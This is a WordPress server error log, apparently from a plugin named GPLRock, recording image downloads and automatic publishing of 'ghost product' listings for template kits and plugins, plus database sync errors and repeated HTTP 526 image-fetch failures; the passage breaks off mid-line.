pre-downloaded image for product macello-business-consulting-accounting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0d6475dd.webp [05-Apr-2026 06:58:56 UTC] GPLRock: Ghost product published with image - Product ID: macello-business-consulting-accounting-elementor-template-kit [05-Apr-2026 06:58:57 UTC] GPLRock: Image downloaded successfully for product macak-dermatology-clinic-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-60d382e3.webp [05-Apr-2026 06:58:57 UTC] GPLRock: Using pre-downloaded image for product macak-dermatology-clinic-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-60d382e3.webp [05-Apr-2026 06:58:57 UTC] GPLRock: Ghost product published with image - Product ID: macak-dermatology-clinic-elementor-template-kit [05-Apr-2026 06:58:59 UTC] GPLRock: Image downloaded successfully for product mabera-car-service-repair-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-811fe5bf.webp [05-Apr-2026 06:58:59 UTC] GPLRock: Using pre-downloaded image for product mabera-car-service-repair-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-811fe5bf.webp [05-Apr-2026 06:58:59 UTC] GPLRock: Ghost product published with image - Product ID: mabera-car-service-repair-elementor-template-kit [05-Apr-2026 06:59:00 UTC] GPLRock: Image downloaded successfully for product lykke-creative-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b0fa70c2.webp [05-Apr-2026 06:59:00 UTC] GPLRock: Using pre-downloaded image for product lykke-creative-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b0fa70c2.webp [05-Apr-2026 06:59:00 UTC] GPLRock: Ghost product published with image - Product ID: lykke-creative-agency-elementor-template-kit [05-Apr-2026 06:59:02 UTC] GPLRock: Image downloaded successfully for product lyfes-feminine-life-coach-speaker-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e0da614e.jpg [05-Apr-2026 06:59:02 UTC] GPLRock: Using pre-downloaded image for product lyfes-feminine-life-coach-speaker-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e0da614e.jpg [05-Apr-2026 06:59:02 UTC] GPLRock: Ghost product published with image - Product ID: lyfes-feminine-life-coach-speaker-elementor-template-kit [05-Apr-2026 06:59:04 UTC] GPLRock: Image downloaded successfully for product luxdiamond-jewelry-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99a650f4.webp [05-Apr-2026 06:59:04 UTC] GPLRock: Using pre-downloaded image for product luxdiamond-jewelry-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99a650f4.webp [05-Apr-2026 06:59:04 UTC] GPLRock: Ghost product published with image - Product ID: luxdiamond-jewelry-shop-elementor-template-kit [05-Apr-2026 06:59:05 UTC] GPLRock: Image downloaded successfully for product luwe-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d9571c78.webp [05-Apr-2026 06:59:05 UTC] GPLRock: Using pre-downloaded image for product luwe-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d9571c78.webp [05-Apr-2026 06:59:05 UTC] GPLRock: Ghost product published with image - Product ID: luwe-restaurant-elementor-template-kit [05-Apr-2026 06:59:07 UTC] GPLRock: Image downloaded successfully for product lure-modern-dermatology-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a38cefe6.webp [05-Apr-2026 06:59:07 UTC] GPLRock: Using pre-downloaded image for product lure-modern-dermatology-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a38cefe6.webp [05-Apr-2026 06:59:07 UTC] GPLRock: Ghost product published with image - Product ID: lure-modern-dermatology-elementor-template-kit [05-Apr-2026 07:00:27 UTC] GPLRock: Image downloaded successfully for product texter-content-writing-service-agency-elementor-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3b2d88cc.webp [05-Apr-2026 07:00:27 UTC] GPLRock: Using pre-downloaded image for product texter-content-writing-service-agency-elementor-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3b2d88cc.webp [05-Apr-2026 07:00:27 UTC] GPLRock: Ghost product published with image - Product ID: texter-content-writing-service-agency-elementor-kit [05-Apr-2026 07:00:31 UTC] GPLRock: Image downloaded successfully for product tetta-photography-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d7059963.webp [05-Apr-2026 07:00:31 UTC] GPLRock: Using pre-downloaded image for product tetta-photography-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d7059963.webp [05-Apr-2026 07:00:31 UTC] GPLRock: Ghost product published with image - Product ID: tetta-photography-portfolio-elementor-template-kit [05-Apr-2026 07:00:32 UTC] GPLRock: Image downloaded successfully for product telce-creative-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bd504eff.webp [05-Apr-2026 07:00:32 UTC] GPLRock: Using pre-downloaded image for product telce-creative-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bd504eff.webp [05-Apr-2026 07:00:32 UTC] GPLRock: Ghost product published with image - Product ID: telce-creative-agency-elementor-template-kit [05-Apr-2026 07:00:34 UTC] GPLRock: Image downloaded successfully for product tector-bodyguard-security-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9f44af9e.webp [05-Apr-2026 07:00:34 UTC] GPLRock: Using pre-downloaded image for product tector-bodyguard-security-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9f44af9e.webp [05-Apr-2026 07:00:34 UTC] GPLRock: Ghost product published with image - Product ID: tector-bodyguard-security-agency-elementor-template-kit [05-Apr-2026 07:00:35 UTC] GPLRock: Image downloaded successfully for product techvisio-technology-software-development-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d0b1209.webp [05-Apr-2026 07:00:35 UTC] GPLRock: Using pre-downloaded image for product techvisio-technology-software-development-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d0b1209.webp [05-Apr-2026 07:00:35 UTC] GPLRock: Ghost product published with image - Product ID: techvisio-technology-software-development-elementor-template-kit [05-Apr-2026 07:00:37 UTC] GPLRock: Image downloaded successfully for product techup-technology-it-solutions-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-80b7903e.webp [05-Apr-2026 07:00:37 UTC] GPLRock: Using pre-downloaded image for product techup-technology-it-solutions-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-80b7903e.webp [05-Apr-2026 07:00:37 UTC] GPLRock: Ghost product published with image - Product ID: techup-technology-it-solutions-services-elementor-template-kit [05-Apr-2026 07:00:38 UTC] GPLRock: Image downloaded successfully for product techplus-tech-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d8d773f.webp [05-Apr-2026 07:00:38 UTC] GPLRock: Using pre-downloaded image for product techplus-tech-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d8d773f.webp [05-Apr-2026 07:00:38 UTC] GPLRock: Ghost product published with image - Product ID: techplus-tech-business-elementor-template-kit [05-Apr-2026 07:00:40 UTC] GPLRock: Image downloaded successfully for product switch-payment-app-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bf8d78d0.webp [05-Apr-2026 07:00:40 UTC] GPLRock: Using pre-downloaded image for product switch-payment-app-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bf8d78d0.webp [05-Apr-2026 07:00:40 UTC] GPLRock: Ghost product published with image - Product ID: switch-payment-app-elementor-template-kit [05-Apr-2026 07:00:41 UTC] GPLRock: Image downloaded successfully for product superv-cafe-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bdffd6e0.webp [05-Apr-2026 07:00:41 UTC] GPLRock: Using pre-downloaded image for product superv-cafe-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bdffd6e0.webp [05-Apr-2026 07:00:41 UTC] GPLRock: Ghost product published with image - Product ID: superv-cafe-restaurant-elementor-template-kit [05-Apr-2026 07:00:43 UTC] GPLRock: Image downloaded successfully for product suki-meditation-channel-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8d7866d7.webp [05-Apr-2026 07:00:43 UTC] GPLRock: Using pre-downloaded image for product suki-meditation-channel-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8d7866d7.webp [05-Apr-2026 07:00:43 UTC] GPLRock: Ghost product published with image - Product ID: suki-meditation-channel-elementor-template-kit [05-Apr-2026 07:02:28 UTC] GPLRock: Image downloaded successfully for product mainwp-branding (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ca363960.jpg [05-Apr-2026 07:02:28 UTC] GPLRock: Using pre-downloaded image for product mainwp-branding: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ca363960.jpg [05-Apr-2026 07:02:28 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-branding [05-Apr-2026 07:02:30 UTC] GPLRock: Image downloaded successfully for product wp-rich-snippets-call-to-action (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c7edc9c1.jpg [05-Apr-2026 07:02:30 UTC] GPLRock: Using pre-downloaded image for product wp-rich-snippets-call-to-action: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c7edc9c1.jpg [05-Apr-2026 07:02:30 UTC] GPLRock: Ghost product published with image - Product ID: wp-rich-snippets-call-to-action [05-Apr-2026 07:02:31 UTC] GPLRock: Image downloaded successfully for product studiopress-ambiance-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cdcaa8de.jpg [05-Apr-2026 07:02:31 UTC] GPLRock: Using pre-downloaded image for product studiopress-ambiance-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cdcaa8de.jpg [05-Apr-2026 07:02:31 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-ambiance-pro-genesis-wordpress-theme [05-Apr-2026 07:02:33 UTC] GPLRock: Image downloaded successfully for product uni-cpo-woocommerce-options-and-price-calculation-formulas (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-407b4dde.jpg [05-Apr-2026 07:02:33 UTC] GPLRock: Using pre-downloaded image for product uni-cpo-woocommerce-options-and-price-calculation-formulas: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-407b4dde.jpg [05-Apr-2026 07:02:33 UTC] GPLRock: Ghost product published with image - Product ID: uni-cpo-woocommerce-options-and-price-calculation-formulas [05-Apr-2026 07:02:35 UTC] GPLRock: Image downloaded successfully for product themify-builder-pricing-table (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2ddc2fa8.jpg [05-Apr-2026 07:02:35 UTC] GPLRock: Using pre-downloaded image for product themify-builder-pricing-table: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2ddc2fa8.jpg [05-Apr-2026 07:02:35 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-pricing-table [05-Apr-2026 07:02:37 UTC] GPLRock: Image downloaded successfully for product memberpress-campaign-monitor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a39ed330.jpg [05-Apr-2026 07:02:37 UTC] GPLRock: Using pre-downloaded image for product memberpress-campaign-monitor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a39ed330.jpg [05-Apr-2026 07:02:37 UTC] GPLRock: Ghost product published with image - Product ID: memberpress-campaign-monitor [05-Apr-2026 07:02:39 UTC] GPLRock: Image downloaded successfully for product openswatch-woocommerce-variations-image-swatch (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bb74b2e3.jpg [05-Apr-2026 07:02:39 UTC] GPLRock: Using pre-downloaded image for product openswatch-woocommerce-variations-image-swatch: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bb74b2e3.jpg [05-Apr-2026 07:02:39 UTC] GPLRock: Ghost product published with image - Product ID: openswatch-woocommerce-variations-image-swatch [05-Apr-2026 07:02:43 UTC] GPLRock: Image downloaded successfully for product give-gift-aid (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7ed4eb87.jpg [05-Apr-2026 07:02:43 UTC] GPLRock: Using pre-downloaded image for product give-gift-aid: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7ed4eb87.jpg [05-Apr-2026 07:02:43 UTC] GPLRock: Ghost product published with image - Product ID: give-gift-aid [05-Apr-2026 07:02:45 UTC] GPLRock: Image downloaded successfully for product sensei-course-participants (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9b35c578.jpg [05-Apr-2026 07:02:45 UTC] GPLRock: Using pre-downloaded image for product sensei-course-participants: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9b35c578.jpg [05-Apr-2026 07:02:45 UTC] GPLRock: Ghost product published with image - Product ID: sensei-course-participants [05-Apr-2026 07:02:47 UTC] GPLRock: Image downloaded successfully for product interlinks-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff08c36a.jpg [05-Apr-2026 07:02:47 UTC] GPLRock: Using pre-downloaded image for product interlinks-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff08c36a.jpg [05-Apr-2026 07:02:47 UTC] GPLRock: Ghost product published with image - Product ID: interlinks-manager [05-Apr-2026 07:04:23 UTC] GPLRock: Image downloaded successfully for product gilkan-dermatology-skin-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-da3ba97a.webp [05-Apr-2026 07:04:23 UTC] GPLRock: Using pre-downloaded image for product gilkan-dermatology-skin-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-da3ba97a.webp [05-Apr-2026 07:04:23 UTC] GPLRock: Ghost product published with image - Product ID: gilkan-dermatology-skin-care-elementor-template-kit [05-Apr-2026 07:04:24 UTC] GPLRock: Image downloaded successfully for product gilgamesh-creative-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aaccd5ad.webp [05-Apr-2026 07:04:24 UTC] GPLRock: Using pre-downloaded image for product gilgamesh-creative-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aaccd5ad.webp [05-Apr-2026 07:04:24 UTC] GPLRock: Ghost product published with image - Product ID: gilgamesh-creative-portfolio-elementor-template-kit [05-Apr-2026 07:04:25 UTC] GPLRock: Image downloaded successfully for product gild-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aa7ce86b.webp [05-Apr-2026 07:04:26 UTC] GPLRock: Using pre-downloaded image for product gild-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aa7ce86b.webp [05-Apr-2026 07:04:26 UTC] GPLRock: Ghost product published with image - Product ID: gild-agency-elementor-template-kit [05-Apr-2026 07:04:27 UTC] GPLRock: Image downloaded successfully for product ggwepe-esports-gaming-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0b7158e4.jpg [05-Apr-2026 07:04:27 UTC] GPLRock: Using pre-downloaded image for product ggwepe-esports-gaming-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0b7158e4.jpg [05-Apr-2026 07:04:27 UTC] GPLRock: Ghost product published with image - Product ID: ggwepe-esports-gaming-elementor-template-kit [05-Apr-2026 07:04:29 UTC] GPLRock: Image downloaded successfully for product gettree-garden-landscaping-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6bb596e0.jpg [05-Apr-2026 07:04:29 UTC] GPLRock: Using pre-downloaded image for product gettree-garden-landscaping-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6bb596e0.jpg [05-Apr-2026 07:04:29 UTC] GPLRock: Ghost product published with image - Product ID: gettree-garden-landscaping-elementor-template-kit [05-Apr-2026 07:04:31 UTC] GPLRock: Image downloaded successfully for product getstall-grocery-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9495bab6.webp [05-Apr-2026 07:04:31 UTC] GPLRock: Using pre-downloaded image for product getstall-grocery-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9495bab6.webp [05-Apr-2026 07:04:31 UTC] GPLRock: Ghost product published with image - Product ID: getstall-grocery-store-elementor-template-kit [05-Apr-2026 07:04:32 UTC] GPLRock: Image downloaded successfully for product gellod-esport-gaming-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0c536cef.webp [05-Apr-2026 07:04:32 UTC] GPLRock: Using pre-downloaded image for product gellod-esport-gaming-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0c536cef.webp [05-Apr-2026 07:04:32 UTC] GPLRock: Ghost product published with image - Product ID: gellod-esport-gaming-elementor-template-kit [05-Apr-2026 07:04:33 UTC] GPLRock: Image downloaded successfully for product gekopi-coffee-shop-blog-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a44367e8.webp [05-Apr-2026 07:04:34 UTC] GPLRock: Using pre-downloaded image for product gekopi-coffee-shop-blog-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a44367e8.webp [05-Apr-2026 07:04:34 UTC] GPLRock: Ghost product published with image - Product ID: gekopi-coffee-shop-blog-elementor-template-kit [05-Apr-2026 07:04:35 UTC] GPLRock: Image downloaded successfully for product geegs-content-creator-streamer-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-273b863e.webp [05-Apr-2026 07:04:35 UTC] GPLRock: Using pre-downloaded image for product geegs-content-creator-streamer-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-273b863e.webp [05-Apr-2026 07:04:35 UTC] GPLRock: Ghost product published with image - Product ID: geegs-content-creator-streamer-elementor-template-kit [05-Apr-2026 07:04:36 UTC] GPLRock: Image downloaded successfully for product gedung-contractor-building-construction-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-32ac6379.webp [05-Apr-2026 07:04:36 UTC] GPLRock: Using pre-downloaded image for product gedung-contractor-building-construction-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-32ac6379.webp [05-Apr-2026 07:04:36 UTC] GPLRock: Ghost product published with image - Product ID: gedung-contractor-building-construction-elementor-template-kit [05-Apr-2026 07:04:39 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT option_name, option_value FROM wpwf_options WHERE option_name IN ('_transient_doing_cron','_transient_timeout_doing_cron') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, get_transient, wp_prime_option_caches [05-Apr-2026 07:04:39 UTC] WordPress database error Commands out of sync; you can't run this command now for query INSERT INTO `wpwf_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_doing_cron', '1775372679.3855168819427490234375', 'on') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, add_option [05-Apr-2026 07:06:23 UTC] GPLRock: Image download failed for product popforms-material-design-wordpress-modal-forms-set (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:25 UTC] GPLRock: Image download failed for product popforms-material-design-wordpress-modal-forms-set (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/popforms--material-design-wordpress-modal-forms-set-32461.webp for product popforms-material-design-wordpress-modal-forms-set after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:06:27 UTC] GPLRock: Image download failed for product popforms-material-design-wordpress-modal-forms-set (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:29 UTC] GPLRock: Image download failed for product popforms-material-design-wordpress-modal-forms-set (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/popforms--material-design-wordpress-modal-forms-set-32461.webp for product popforms-material-design-wordpress-modal-forms-set after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:06:32 UTC] GPLRock WARNING: Image download failed for product popforms-material-design-wordpress-modal-forms-set. URL: https://meldwp.com/wp-content/uploads/popforms--material-design-wordpress-modal-forms-set-32461.webp [05-Apr-2026 07:06:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: popforms-material-design-wordpress-modal-forms-set [05-Apr-2026 07:06:32 UTC] GPLRock: Image download failed for product woocommerce-license-delivery-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:34 UTC] GPLRock: Image download failed for product woocommerce-license-delivery-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-license-delivery--management-24391.webp for product woocommerce-license-delivery-management after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:06:36 UTC] GPLRock: Image download failed for product woocommerce-license-delivery-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:38 UTC] GPLRock: Image download failed for product woocommerce-license-delivery-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-license-delivery--management-24391.webp for product woocommerce-license-delivery-management after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:06:40 UTC] GPLRock WARNING: Image download failed for product woocommerce-license-delivery-management. URL: https://meldwp.com/wp-content/uploads/woocommerce-license-delivery--management-24391.webp [05-Apr-2026 07:06:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-license-delivery-management [05-Apr-2026 07:06:40 UTC] GPLRock: Image download failed for product profile-card-v2-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:42 UTC] GPLRock: Image download failed for product profile-card-v2-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/profile-card-v2---addon-for-wpbakery-page-builder-29162.webp for product profile-card-v2-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:06:45 UTC] GPLRock: Image download failed for product profile-card-v2-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:47 UTC] GPLRock: Image download failed for product profile-card-v2-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/profile-card-v2---addon-for-wpbakery-page-builder-29162.webp for product profile-card-v2-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:06:49 UTC] GPLRock WARNING: Image download failed for product profile-card-v2-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/profile-card-v2---addon-for-wpbakery-page-builder-29162.webp [05-Apr-2026 07:06:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: profile-card-v2-addon-for-wpbakery-page-builder [05-Apr-2026 07:06:49 UTC] GPLRock: Image download failed for product the-shop-pwa-ecommerce-cms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:51 UTC] GPLRock: Image download failed for product the-shop-pwa-ecommerce-cms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-shop---pwa-ecommerce-cms-16486.webp for product the-shop-pwa-ecommerce-cms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:06:53 UTC] GPLRock: Image download failed for product the-shop-pwa-ecommerce-cms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:55 UTC] GPLRock: Image download failed for product the-shop-pwa-ecommerce-cms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:06:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-shop---pwa-ecommerce-cms-16486.webp for product the-shop-pwa-ecommerce-cms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:06:57 UTC] GPLRock WARNING: Image download failed for product the-shop-pwa-ecommerce-cms. URL: https://meldwp.com/wp-content/uploads/the-shop---pwa-ecommerce-cms-16486.webp [05-Apr-2026 07:06:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-shop-pwa-ecommerce-cms [05-Apr-2026 07:06:58 UTC] GPLRock: Image download failed for product password-protected-categories-products-pages-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:00 UTC] GPLRock: Image download failed for product password-protected-categories-products-pages-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/password-protected-categories-products--pages-plugin-for-woocommerce-23765.webp for product password-protected-categories-products-pages-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:07:02 UTC] GPLRock: Image download failed for product password-protected-categories-products-pages-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:04 UTC] GPLRock: Image download failed for product password-protected-categories-products-pages-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/password-protected-categories-products--pages-plugin-for-woocommerce-23765.webp for product password-protected-categories-products-pages-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:07:06 UTC] GPLRock WARNING: Image download failed for product password-protected-categories-products-pages-plugin-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/password-protected-categories-products--pages-plugin-for-woocommerce-23765.webp [05-Apr-2026 07:07:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: password-protected-categories-products-pages-plugin-for-woocommerce [05-Apr-2026 07:07:06 UTC] GPLRock: Image download failed for product helium-wordpress-full-screen-menu (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:07:09 UTC] GPLRock: Image download failed for product helium-wordpress-full-screen-menu (attempt 2/3). HTTP Code: 526, 